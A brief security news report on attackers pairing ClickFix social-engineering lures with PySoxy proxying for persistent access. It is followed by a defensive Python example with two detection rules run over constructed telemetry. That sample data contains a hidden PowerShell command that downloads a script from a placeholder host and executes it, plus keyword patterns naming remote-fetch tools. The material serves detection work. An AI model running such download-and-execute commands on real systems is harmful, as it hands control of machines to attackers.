Attackers Use ClickFix and PySoxy Proxying for Persistent Access

Summary
– Attackers use open-source tools to maintain persistent access after initial social engineering.
– ReliaQuest researchers issued a warning about this exploitation method.
Attackers are increasingly weaponizing legitimate open-source tools to establish persistent access following successful social engineering campaigns. Researchers from ReliaQuest have identified a growing trend in which threat actors rely on ClickFix and PySoxy proxying techniques to remain undetected within compromised environments.
By exploiting these publicly available utilities, adversaries can bypass traditional security controls and maintain a foothold long after the initial breach. The ClickFix method leverages a deceptive user interface that tricks victims into executing malicious code under the guise of a routine update or security fix. Meanwhile, PySoxy provides a robust proxying capability that allows attackers to route traffic through compromised machines, effectively masking their command-and-control infrastructure.
This dual approach not only extends the attacker’s dwell time but also complicates detection efforts for security teams. ReliaQuest’s analysis underscores how the abuse of trusted, open-source components enables threat actors to blend in with normal network activity, making it harder for defenders to distinguish between legitimate administrative actions and malicious behavior.
Organizations are urged to scrutinize all instances of remote execution and proxy usage, especially when triggered by unsolicited prompts or social engineering lures. As attackers continue to refine their tactics, reliance on open-source tools for persistence is likely to become even more prevalent.
(Source: Infosecurity Magazine)
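The article's advice to scrutinize user-triggered remote execution and proxy usage, turned into two detection rules run over constructed telemetry. This is an added example, not code from the article or ReliaQuest; the event field names, the indicator lists and the thresholds are assumptions.

```python
import re
from typing import Dict, List

# Assumed indicator lists (example heuristics, not from the article).
INTERACTIVE_PARENTS = {"explorer.exe"}  # desktop shell / Run dialog
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
PYTHON_IMAGES = {"python.exe", "python3", "python"}
REMOTE_FETCH = re.compile(r"https?://|invoke-webrequest|\biwr\b|downloadstring|\bcurl\b", re.I)

# Constructed sample telemetry: process-creation and network events from one host.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "pid": "412", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://update.example.invalid/fix.ps1 | iex"'},
    {"type": "process", "pid": "433", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\ops\\patch.ps1"},
    {"type": "network", "pid": "901", "image": "python.exe", "action": "listen", "dst": "0.0.0.0:1080"},
    {"type": "network", "pid": "901", "image": "python.exe", "action": "connect", "dst": "198.51.100.7:443"},
    {"type": "network", "pid": "901", "image": "python.exe", "action": "connect", "dst": "203.0.113.9:443"},
    {"type": "network", "pid": "901", "image": "python.exe", "action": "connect", "dst": "192.0.2.20:8443"},
    {"type": "network", "pid": "955", "image": "python.exe", "action": "listen", "dst": "127.0.0.1:8000"},
]

def flag_user_triggered_execution(e: Dict[str, str]) -> bool:
    """ClickFix-style lure: an interactive shell (the user acting on a deceptive
    prompt) spawns a script host whose command line fetches remote content."""
    return (e["type"] == "process"
            and e["parent"].lower() in INTERACTIVE_PARENTS
            and e["image"].lower() in SCRIPT_HOSTS
            and REMOTE_FETCH.search(e["cmdline"]) is not None)

def flag_proxy_listeners(events: List[Dict[str, str]], min_peers: int = 3) -> List[str]:
    """PySoxy-style relay: a Python process that both listens on a socket and
    fans out to several distinct peers. Returns the offending pids, sorted."""
    listening, peers = set(), {}
    for e in events:
        if e["type"] != "network" or e["image"].lower() not in PYTHON_IMAGES:
            continue
        if e["action"] == "listen":
            listening.add(e["pid"])
        elif e["action"] == "connect":
            peers.setdefault(e["pid"], set()).add(e["dst"].rsplit(":", 1)[0])
    return sorted(p for p in listening if len(peers.get(p, ())) >= min_peers)

def run_detections(events: List[Dict[str, str]] = EVENTS):
    """Returns (pids of user-triggered remote execution, pids of proxy listeners)."""
    exec_hits = [e["pid"] for e in events if flag_user_triggered_execution(e)]
    return exec_hits, flag_proxy_listeners(events)
```

The legitimately scheduled script (pid 433) and the idle local listener (pid 955) are not flagged, which is the point of correlating parent, command line and peer fan-out rather than alerting on the interpreter alone.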
